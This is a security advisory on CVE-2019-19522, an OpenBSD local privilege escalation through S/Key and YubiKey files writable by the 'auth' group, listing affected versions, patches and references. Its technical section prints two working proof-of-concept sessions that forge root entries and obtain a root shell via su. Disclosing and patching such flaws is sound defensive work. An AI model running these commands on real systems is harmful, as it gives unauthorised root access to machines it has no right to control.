ASA-2019-00653 – OpenBSD: Local privilege escalation via S/Key and YubiKey


Allele Security Alert

ASA-2019-00653

Identifier(s)

ASA-2019-00653, CVE-2019-19522

Title

Local privilege escalation via S/Key and YubiKey

Vendor(s)

The OpenBSD Project

Product(s)

OpenBSD

Affected version(s)

OpenBSD versions 6.6 before errata 009
OpenBSD versions 6.5 before errata 020

Fixed version(s)

OpenBSD version 6.6 errata 009
OpenBSD version 6.5 errata 020

OpenBSD versions 6.6 with the following patch applied:

009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig

OpenBSD versions 6.5 with the following patch applied:

020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig

Proof of concept

Yes

Description

OpenBSD, in a non-default configuration where S/Key or YubiKey authentication is enabled, allows local users to become root by leveraging membership in the auth group. This occurs because root’s file can be written to /etc/skey or /var/db/yubikey, and need not be owned by root.

Technical details

If the S/Key or YubiKey authentication type is enabled (they are both installed by default but disabled), then a local attacker can exploit the privileges of the group “auth” to obtain the full privileges of the user “root” (because login_skey and login_yubikey do not verify that the files in /etc/skey and /var/db/yubikey belong to the correct user, and these directories are both writable by the group “auth”).

(Note: to obtain the privileges of the group “auth”, a local attacker can first exploit ASA-2019-00651 / CVE-2019-19520 in xlock.)

If S/Key is enabled (via skeyinit -E), a local attacker with “auth” privileges can add an S/Key entry (a file in /etc/skey) for the user “root” (if this file already exists, the attacker cannot simply remove or rename it, because /etc/skey is sticky; a simple workaround exists, and is left as an exercise for the interested reader):

------------------------------------------------------------------------------
$ id
uid=32767(nobody) gid=11(auth) groups=32767(nobody)

$ echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root

$ chmod 0600 /etc/skey/root

$ env -i TERM=vt220 su -l -a skey
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN

# id
uid=0(root) gid=0(wheel) ...
------------------------------------------------------------------------------

If YubiKey is enabled (via login.conf), a local attacker with “auth” privileges can add a YubiKey entry (two files in /var/db/yubikey) for the user “root” (if these files already exist, the attacker can simply remove or rename them, because /var/db/yubikey is not sticky):

------------------------------------------------------------------------------
$ id
uid=32767(nobody) gid=11(auth) groups=32767(nobody)

$ echo 32d32ddfb7d5 > /var/db/yubikey/root.uid

$ echo 554d5eedfd75fb96cc74d52609505216 > /var/db/yubikey/root.key

$ env -i TERM=vt220 su -l -a yubikey
Password: krkhgtuhdnjclrikikklulkldlutreul

# id
uid=0(root) gid=0(wheel) ...
------------------------------------------------------------------------------

Credits

Qualys Research Team

Reference(s)

OpenBSD 6.6 Errata
https://www.openbsd.org/errata66.html

OpenBSD 6.5 Errata
https://www.openbsd.org/errata65.html

009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig

020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig

Constrain honouring of path-related environment variables based upon
https://github.com/openbsd/xenocara/commit/5886ab525a096cb2504f9e3ce1cd4fd79fb1e414

Full Disclosure: Authentication vulnerabilities in OpenBSD
https://seclists.org/fulldisclosure/2019/Dec/14

oss-security – Authentication vulnerabilities in OpenBSD
https://www.openwall.com/lists/oss-security/2019/12/04/5

Bugtraq: Authentication vulnerabilities in OpenBSD
https://seclists.org/bugtraq/2019/Dec/8

ASA-2019-00651 – OpenBSD: Local privilege escalation via xlock
https://allelesecurity.com/ASA-2019-00651/

CVE-2019-19520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19520

CVE-2019-19520
https://nvd.nist.gov/vuln/detail/CVE-2019-19520

CVE-2019-19522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19522

CVE-2019-19522
https://nvd.nist.gov/vuln/detail/CVE-2019-19522

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: February 11, 2020

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.